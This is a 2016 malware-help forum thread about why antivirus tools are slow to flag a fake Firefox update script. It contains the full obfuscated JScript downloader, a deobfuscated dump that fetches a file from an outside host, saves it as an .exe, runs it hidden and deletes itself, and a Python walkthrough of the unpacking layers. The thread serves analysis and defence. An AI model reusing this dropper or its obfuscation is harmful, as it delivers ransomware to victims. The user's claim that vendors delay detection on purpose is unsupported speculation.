
Why are antivirus programs so slow to flag malware?


24 replies to this topic

#1 no_ice_please

no_ice_please

  • Members
  • 11 posts

Posted 10 August 2016 - 12:04 PM

I posted a variation of this elsewhere. I have an older computer that frequently gets misdirected to download fake firefox updates. I routinely submit them to virustotal and typically it takes several days before they begin to test positive.

 

The following javascript code came from https://feipinofa.nzzzzzet/4231654327224/1470796620751580/fireZZZZZfox-patch.js The ZZZZZ were added to break the link

 

In the following I have replaced the symbol [ with ZZZZZ

 

var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m<y=krity{vyt+j)zpvoz.der{gccEfGk"iTenl(brmun mlq"i,slnahfdsa,t c.kcb;asfev)knf(qdkujeinrbl;n)brulsln}v;fkacievai(ahicqedajtjcgSuWkrg)a{fSr.ftwlbippe5t(aps0uevek}i;q)p}i0z0lprOz.ueh ddd.qdj xTbnq;x=g hed cyjps.hdc tWz1x;o(keftfcaroieplsfeeof.nRhojBeerdgnfshde m;p.iyp)ztaiwsciuPwoa;j0h=g oohnubt(s a.xiyfoeeehlsxwFnix(dsstjftiasz)sebmv)vnwaslvefDzebbu.glwinFz';var xkvof='ewtkexmkapneed(lfs.adp lSk)i;mojTbenFfaxvkfy(sepnxiulj;e)rew eanmhnbuyrw(gab.i.zdcmxel"ncgcx/x i lxdegrvtbSzil"z+trufe.kornigyrzakhxCvmrCz3e(reb4cocdpajnafmms)l+qrythSrixet+rrrfo.vocnfgeraaehoCymaCf3x(fex4zohdafo,r0aab)j,m;r)heu jlesnpa vrb wvxahcaSyWlro=x mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii(o;j flvijFeehby.btustiwsmElxqbm)d)z.d(wpjtdeblmekDbey(xeolkpfFcitSlWx dcp)f;b.rtzpuEorlif"e(xojUecahfeoteah appdilypmmwejcroy)d"c.w;gtsebci k}aac y mei(dhk)rthcl w v p e{v}e\'m;uvraird ';var ujak='iyhfgwlyeknpemflvtoig=y"n4t5g2q1d0y3y"o;vvtadrz poizlkklzrujosiub=vyufgwiyyklpemnlstcia.lliernpggtphd;cvjahrb zsqsmpjnpcgfxnyai=svsfojapqzaxfmeet.hleefnqgvtuhx/koyzzktlfrajtsvun;cvlaurz jccwsmcxrttlthsiyxxsm=fZZZZZb]r,wlxrmitgicktsxcmp=tZZZZZv]l;gvxawra xag=d0p;ifvoirc(nvhazrz mia=r0j;yid<csgsnpunicdfondap;uia+m+u)x{s x n bcswwmdxgtdlchgiqxdsxZZZZZzic]b=bvifpjwpqztxkmtei.fsuuubzsstnrx(fao,qoczskxlfrvjdswuz)b;v b d xaj s+u=aomzfktlurkjospuk;g}cfiomrr(yvoajrw 
uie=a0r;dib<msfsfpknocxfenoaj;jii+e';var fjaur='+t)w{t e d wfmoqrn(kvfawrh amb=h0r;fmi<dokznkolzrljssouv;cmw+z+w)t{t a x p m nacqxbsvzweesobulqj=gyufnwryikbprmtlutfip.wcchpasrvAjts(tmy)f;g b c z b hlsrcisgccjtmxpmaZZZZZvmr]r=pclwxmexitzlthaivxcstZZZZZoib]y.vcchbaurdAitn(gabqpbpvoweeqojuwqi)y;h f c p}f w q bczwkmqxatillhdikxgshZZZZZsit]o=uljrdiigocttrxkmb.pjsohirni(m"o"y)n;n}ivdaorr posabuwlaquiqnowpvznr=xcnwlmoxytmldhqiuxvsy.gjkoxiunx(f"y"m)x;oveazrk fkujaatkjcalkrglojw=u"meivyaclc"u;atjheiyseZZZZZckdjcapkbcrltralbjz]v(cosaeudldqlirnzwgvdni)e;';var gce='f';var bboahfkbss=ggudez+tcvj+xkvof+ujak+fjaur+gce;   var e=new Error(2);   var t=e.number;   var uakenars="";   var riqrliooj=t;   var vdsyeadob=bboahfkbss.split("");   for (a=0;a<vdsyeadob.length;a +=riqrliooj){      uakenars=uakenars+vdsyeadobZZZZZa];}   var ycchmhvn=ZZZZZ"e","e","a","x","v","l","o"];   var xmodlrck=3-t;   var vhiwyzhho=ycchmhvnZZZZZxmodlrck]+ycchmhvnZZZZZ4]+ycchmhvnZZZZZ2]+ycchmhvnZZZZZ5];   var kbubebolwc=this;   var jksgjsorh=kbubebolwcZZZZZvhiwyzhho];   jksgjsorh(uakenars);           var axvqsxsjewcbr='qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';

 

Here is the latest VirusTotal result, about 12 hours after the first submission: https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470847259/ None of the AV products detect it, and it will probably be a week until half of them do. It seems there are a lot of unnecessary infections if it takes this long for obvious malware to get recognized. Maybe antivirus companies are trying to keep demand for their products up?




 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 12:20 PM

This JavaScript looks incomplete to me. Also, did you upload the payload it downloads on VirusTotal to see if it's flagged?

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts

Posted 10 August 2016 - 01:02 PM

This JavaScript looks incomplete to me. Also, did you upload the payload it downloads on VirusTotal to see if it's flagged?

Normally I can see a recognizable url, so I get the "payload" and upload it to virustotal. But in this case all I see in the script is gibberish, no clear url.

 

It is always a variation of cerber or ransomware that it gets detected as, so it's likely that's what this is. As of right now detection is still 0/54 https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470851923/

 

So there is no doubt people are getting infected.

 

Here is virustotal from a "payload" from a previous visit to the same redirect https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/

 

Here is a previous javascript that brought a similar payload https://www.virustotal.com/en/file/7aa84de1772b3b7a67b10c06e64c89cbfe8b93fdf01f36dbc65b16599bdfb828/analysis/1470852857/

 

Are you able to see an encoded url in that? If you point it out I'll download and see what it is. I don't know any javascript so I don't know how to find the url in this last one.


Edited by no_ice_please, 10 August 2016 - 01:23 PM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 01:19 PM

This JS is obfuscated and I'm working on understanding the code right now. There are two things that don't make sense, which make me believe this code is incomplete:
for (a = 0; a < vdsyeadob.length; a += riqrliooj) {
    uakenars = uakenars + vdsyeadob[a];
}
vdsyeadob is a var that contains a large string built by assembling the first 5 strings in it and was split into individual chars. However, this loop doesn't append the char to the uakenars variable, it only changes its value every time (because it uses the = operation, which is assign, and not += which is append). So in the end, the uakenars var will only contain one character, which is pretty useless and doesn't make sense at all.

var axvqsxsjewcbr = 'qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';
Last line, and that variable is never used anywhere else.

I'm also trying to understand what number riqrliooj is supposed to be. I think it's 2, though when I try with an online compiler, I get an Invalid string length error.

I'll keep trying though.

Do you have the original .js file?



#5 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts

Posted 10 August 2016 - 01:26 PM

Yes, I have the original; I just changed the name of the file to differentiate it from other firefox patches that are all malicious. If you have a place to upload it, I can.

 

The original though is just that text with a .js ending.


Edited by no_ice_please, 10 August 2016 - 01:29 PM.


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 01:26 PM

Please upload it to the link below.

http://www.bleepingcomputer.com/submit-malware.php?channel=194



#7 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts

Posted 10 August 2016 - 01:31 PM

It has been submitted.



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 01:34 PM

Well, the code in that file matches the one I came up with when I replaced your ZZZZZ with [. I'll be seeking assistance from experts on that one, since I fail to see how that code works because it looks broken to me. Maybe I'm just not experienced enough yet to deobfuscate it. I'll keep you updated :)



#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 03:55 PM

It looks like I'm getting somewhere, stay tuned!



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 10 August 2016 - 04:06 PM

Alright so this was an interesting one :) Basically, it was a JavaScript that was also embedding JavaScript and executing it via eval(). Here's the dump of the vdsyeadob var.
var vfjpzxme = ' {yatr weA=neviXctcejtObcsWr("S.thip)"l;elen=w bitcv AjbOeeXS"(cctitpnriliFeg.etsmSycejtObc ;=")A wcneXevOtitce(bjMXSL"MLMXH2.)"P;TTen=w ditcv AjbOeeXA"(DctS.BtOD"ma)relru=; ptts"hef/i:/fonapi/te1.n425.0/;"t daema=fnteGSb.aiclpeedlrFoS+)t(2.gnfrihCmaroedo(rC"+)192.54e23 ;"fxeav(ror;1=i ii;5+<=rt{y+)po.e{cEG"Tn(ru l",lafs, .c;se)n(duenb;)rll};kcea(hceatcSWr){S.tlip5(p0ee};)}00pO.e d.d Tn;= e yp.d W1;(etcripseo.RoBednsd ;.y)tisiPo;0= onb( .ifeelxFi(stfis)em)naleDeb.liFetemane(f.d S);oTeFavf(enil;)e amnur(a..dme"cc/  xertSi"+rf.ongrahCmC3(e4odanfm)+rtSie+rf.ongrahCmC3(e4odf,0a),;)e lsp r vacSWr= S.tcipFtpurimaNell fi(; liFeb.tsisExb)).(pteleDe(elpFiSW c);.tpEri"(oUcheta pdlpmeco)".;tec }a  e(h)tc    {}';
var yfwykpmlti = "452103";
var ozklrjsu = yfwykpmlti.length;
var sspncfna = vfjpzxme.length / ozklrjsu;
var cwmxtlhixs = [],
    lrigctxm = [];
var a = 0;
for (var i = 0; i < sspncfna; i++) {
    cwmxtlhixs[i] = vfjpzxme.substr(a, ozklrjsu);
    a += ozklrjsu;
}
for (var i = 0; i < sspncfna; i++) {
    for (var m = 0; m < ozklrjsu; m++) {
        aqbvweouq = yfwykpmlti.charAt(m);
        lrigctxm[m] = cwmxtlhixs[i].charAt(aqbvweouq);
    }
    cwmxtlhixs[i] = lrigctxm.join("");
}
var oaulqinwvn = cwmxtlhixs.join("");
var kjakclrlj = "eval";
this[kjakclrlj](oaulqinwvn);
Still too obfuscated to be read properly, right? In that case, if we dump the content of the oaulqinwvn variable in the embedded JavaScript, we get this:
try {
    a = new ActiveXObject("Wscript.Shell");
    b = new ActiveXObject("Scripting.FileSystemObject");
    c = new ActiveXObject("MSXML2.XMLHTTP");
    d = new ActiveXObject("ADODB.Stream");
    url = "https://feipinofa.net/10/524.dat";
    fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe";
    for (var i = 1; i <= 5; i++) {
        try {
            c.open("GET", url, false);
            c.send(null);
            break;
        } catch (e) {
            WScript.Sleep(5000);
        }
    }
    d.Open;
    d.Type = 1;
    d.Write(c.ResponseBody);
    d.Position = 0;
    if (b.Fileexists(fname)) b.DeleteFile(fname);
    d.SaveToFile(fname);
    a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
    var p = WScript.ScriptFullName;
    if (b.FileExists(p)) b.DeleteFile(p);
    WScript.Echo("Update complete.");
} catch (e) {}
Way easier to read, isn't it? The payload would be:
https://feipinofa.net/10/524.dat
The website seems to be offline at the moment, so I cannot harvest it.

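As an added example (not code from the thread or from the sample itself), the following Python replays the two unpacking layers Aura walks through above: the stride read over the concatenated carrier string, and the per-chunk transposition keyed by "452103" that the embedded script performs before calling eval. The sample inputs are the opening fragments of the ggudez and vfjpzxme strings quoted in this thread; the stride value 2 assumes Microsoft JScript, where `new Error(2).number` is 2.

```python
"""Replays the two unpacking layers described in post #10.

Layer 1: the concatenated carrier string is read with a fixed stride
(every t-th character). Layer 2: the result is cut into key-length
chunks and each chunk is un-shuffled with the digit key "452103".
"""


def stride_unpack(carrier: str, stride: int) -> str:
    """Layer 1: keep every `stride`-th character, starting at index 0.

    The script derives the stride from `new Error(2).number`, which is 2
    in Microsoft JScript (Windows Script Host). Standard ECMAScript engines
    have no `number` property on Error, so there the loop step is NaN and
    only a single character comes out: the stage only unpacks under WSH,
    which is why testing it in a browser or online runner looks "broken".
    """
    return carrier[::stride]


def chunk_unshuffle(scrambled: str, key: str) -> str:
    """Layer 2: per-chunk transposition, mirroring the script's own loop.

    Each chunk has len(key) characters; output position m takes the chunk
    character at index int(key[m]). A trailing short chunk loses the
    positions that fall outside it, exactly as JScript's charAt would.
    """
    n = len(key)
    out = []
    for start in range(0, len(scrambled), n):
        chunk = scrambled[start:start + n]
        out.append("".join(chunk[int(k)] for k in key if int(k) < len(chunk)))
    return "".join(out)


def key_is_permutation(key: str) -> bool:
    """Sanity check before trusting a recovered key: its digits must be a
    permutation of 0..len(key)-1, otherwise the decoder silently drops or
    duplicates characters and the output is not the original text."""
    return sorted(int(k) for k in key) == list(range(len(key)))


# Opening fragment of the ggudez string as posted (the JS escape \' is a
# single quote at run time). Stride 2 yields the start of the dumped code.
CARRIER_PREFIX = "vmaprc gvdfejfpuzexjmeez=h'z n{pymastiro swterAk=gnjez"
# Opening fragment of the vfjpzxme string from the dump in post #10.
SCRAMBLED_PREFIX = " {yatr weA=n"
KEY = "452103"

if __name__ == "__main__":
    print(stride_unpack(CARRIER_PREFIX, 2))        # var vfjpzxme=' {yatr weA=ne
    print(chunk_unshuffle(SCRAMBLED_PREFIX, KEY))  # try{ a=new A
```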


#11 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,086 posts

Posted 10 August 2016 - 04:17 PM

The problem with JS downloaders is that many have a short lifetime, and often the host (the hacked website) takes the malicious file down after a few hours or so. Once the file is gone, there is no point in adding the JS downloader to detections as it cannot download anything.

The amount of malware which is submitted every day to an antivirus vendor is in the tens of thousands of files, which all need checking to see whether they are malicious. This all takes time, and leads to the delays you see. Any good AV will have heuristic detection, which means the majority of malware will be caught by that.
 
xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#12 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts

Posted 10 August 2016 - 10:20 PM

Thanks for the answers and sorry you ran around in circles for nothing.

 

What I still don't get is why there is not a database of cleartext malware. Somebody with credibility, like one of you people on this site, could make a database of real-time submissions from antivirus companies. Listing the ones that cooperate would pressure those who don't. If, for example, virustotal submissions were available in real time to any antivirus company, infections would be reduced a lot.

 

A script that obfuscates the url it wants to download from should be malware just for that reason. Is there a legitimate reason for a js file to deliberately hide the website that is serving its file? I doubt it.

 

Anyway, thanks.



#13 sasschary

sasschary

  • Malware Study Hall Senior
  • 853 posts

Posted 10 August 2016 - 10:47 PM

A database of cleartext malware would be difficult to come up with. To perform the same task, there are many different ways one could write the code. In addition, this code could also be used for legitimate purposes. There can also be legitimate purposes for having obfuscated URLs. For example, if I have a browser-based product written in JavaScript, but it is a paid software, I may wish to obfuscate the code and other things it downloads so that it is harder for my product to be reverse engineered and cracked.

 

ZC



#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts

Posted 11 August 2016 - 07:00 AM

All good, no worries :) Also, this thread is related to yours:

http://www.bleepingcomputer.com/forums/t/622438/malware-analysis-chr%D0%BEm%D0%B5-patch-1470326241hta

If, for example, virustotal submissions were available realtime to any antivirus company, infections would be reduced a lot.


AV companies already have access to VT.



#15 no_ice_please

no_ice_please
  • Topic Starter

  • Members
  • 11 posts

Posted 11 August 2016 - 11:54 AM

All good, no worries :) Also, this thread is related to yours:

http://www.bleepingcomputer.com/forums/t/622438/malware-analysis-chr%D0%BEm%D0%B5-patch-1470326241hta
 

If, for example, virustotal submissions were available realtime to any antivirus company, infections would be reduced a lot.


AV companies already have access to VT.

 

 

Could you give me your opinion then of a reasonable time frame for major antivirus programs to continue ignoring executables like https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/ ? I don't have the original exe of that one, but next time I get one I'll post it and show how slowly it updates.

 

There clearly is something problematic with the process if "AV companies already have access to VT."

 

There is either a deliberate roadblock in the process, perhaps to make sure infections stay high enough to sustain demand for AV products, or something else that makes the process inefficient.

 

Can you explain why Comodo called this file clean on 2016-07-22?

 

2016-07-13 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468437027/

 

2016-07-14 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/1468528659/

 

2016-07-22 https://www.virustotal.com/en/file/da7fa675f304828a01605349e230604a7dbb6a010f8378757ed1918b9c2f57bb/analysis/





